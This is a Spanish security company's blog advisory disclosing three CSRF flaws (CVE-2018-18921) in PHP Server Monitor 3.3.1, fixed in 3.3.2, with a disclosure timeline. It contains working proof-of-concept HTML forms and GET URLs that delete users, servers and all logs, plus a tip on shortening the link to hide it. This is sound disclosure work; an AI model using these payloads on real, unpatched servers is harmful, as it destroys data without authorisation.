Este sitio Web utiliza cookies propias y de terceros para realizar el análisis de navegación de los usuarios. Si continua navegando acepta el uso de cookies. Este sitio web es propiedad de Sidertia Solutions S.L., empresa responsable de su mantenimiento. Haga clic aquí para obtener más información acerca de nuestra política de Cookies.
Aceptar
es-ESen-US



BLOG DE SIDERTIA

Corregidas las vulnerabilidades CSRF descubiertas en PHP Server Monitor

Escrito por Javier Olmedo - 28 November 2018

Server Monitor es una aplicación web orientada a monitorizar la disponibilidad de servidores PHP, comprueba si están correctamente funcionando, monitoriza los servicios, genera gráficos e historial de actividad además de almacenar logs de errores y permitir notificaciones a través de email y Telegram, está desarrollada en PHP y MySQL.

Durante una auditoría a unos de nuestros clientes, se descubrieron tres vulnerabilidades Cross-Site Request Forgery que afectaban al core de la aplicación.

Versiones afectadas

La versión 3.3.1 y anteriores están afectadas con estas vulnerabilidades.

Referencia CVE

Estas vulnerabilidades han quedado asociadas al CVE-2018-18921

Fix del vendedor

La vulnerabilidad ha quedado corregida en la versión 3.3.2

Descripción

A través de estas vulnerabilidades Cross-Site Request Forgery (CSRF), un atacante podría aprovecharse de la confianza que tiene la aplicación sobre los usuarios legítimos para crear un enlace o formulario malicioso que será ejecutado a través de estos.

Durante la auditoria, se observó que el botón encargado de borrar los usuarios, servidores y logs, se realizaba por petición GET y carecía de token anti-csrf.

Esto, permitiría a un atacante crear un enlace malicioso modificando los valores de los parámetros mod, action e id para realizar acciones de eliminación de objetos sobre la aplicación.

Prueba de concepto (PoC)

En las siguientes pruebas de concepto, se ha dividido la pantalla en dos partes, en la parte izquierda se encontraría un usuario en el panel de administración mientras que, en la parte derecha, un atacante genera un botón malicioso previamente configurado para realizar las acciones.

NOTA

Se han utilizado formularios para la explotación de la vulnerabilidad, pero en un escenario real, a un atacante le bastaría con generar el enlace y acortar la URL (Google URL Shortener) para ofuscar la acción e intentar explotar la vulnerabilidad con éxito, ya que las peticiones se realizan por GET.

Eliminación de usuarios

http://localhost/?&mod=user&action=delete&id=[ID]

Ver PoC animada

<html>

<body>

<script>history.pushState('', '', '/')</script>

<form action="http://localhost/">

   <input type="hidden" name="mod" value="user" />

   <input type="hidden" name="action" value="delete" />

   <input type="hidden" name="id" value="[ID]" />

   <input type="submit" value="Delete User" />

</form>

</body>

</html>

Eliminación de servidores

http://localhost/?&mod=server&action=delete&id=[ID]

Ver PoC animada

<html>

 <body>

 <script>history.pushState('', '', '/')</script>

  <form action="http://localhost/">

   <input type="hidden" name="mod" value="server" />

   <input type="hidden" name="action" value="delete" />

   <input type="hidden" name="id" value="[ID]" />

   <input type="submit" value="Delete Server" />

  </form>

 </body>

</html>

Eliminación de todos los logs

http://localhost/?&mod=server_log&action=delete

Ver Poc animada

<html>

 <body>

 <script>history.pushState('', '', '/')</script>

  <form action="http://localhost/">

   <input type="hidden" name="mod" value="server&#95;log" />

   <input type="hidden" name="action" value="delete" />

   <input type="submit" value="Delete All Logs" />

  </form>

 </body>

</html>

Timeline

  • 30/10/2018 Descubrimiento
  • 30/10/2018 Issue en GitHub
  • 30/10/2018 Se pone en conocimiento al desarrollador
  • 01/11/2018 Solicitud ID CVE
  • 03/11/2018 Asignación de CVE-2018-18921 por parte de MITRE
  • 22/11/2018 Vulnerabilidad parcheada
  • 28/11/2018 Publicación de la vulnerabilidad

Referencias


Escribe tu comentario

SUSCRIBIRSE



ÚLTIMAS NOTICIASNoticias

  • miércoles, 28 de noviembre de 2018

    SIDERTIA, PATROCINADOR GOLD de las XII Jornadas del CCN-CERT

    Leer más...

  • miércoles, 21 de noviembre de 2018

    CCN-CERT, con la colaboración de SIDERTIA, desarrolla con éxito el taller 'Análisis de Seguridad de Aplicaciones Web y Búsqueda de Evidencias Digitales' para la OEA

    Leer más...

  • viernes, 22 de diciembre de 2017

    Sidertia Solutions en las XI Jornadas STIC-CCN-CERT

    Leer más...



ÚLTIMOS TWEETSTwitter





ARCHIVO



ETIQUETAS


NUESTRO PORTAFOLIO DE SERVICIOS

  • Consultoría Consultoría

    Servicios de consultoría especializada de la mano de profesionales altamente cualificados.

  • Formación Formación

    Reciba formación experta de calidad ajustada a sus necesidades.

  • Seguridad Seguridad TIC

    Sidertia Solutions le ayuda a implementar y mantener su modelo de seguridad.

  • Desarrollo Desarrollo

    Soluciones de desarrollo seguro para su empresa.


  • Microsoft Silver Partner
  • Citrix Silver Partner
  • Dell Partner Registered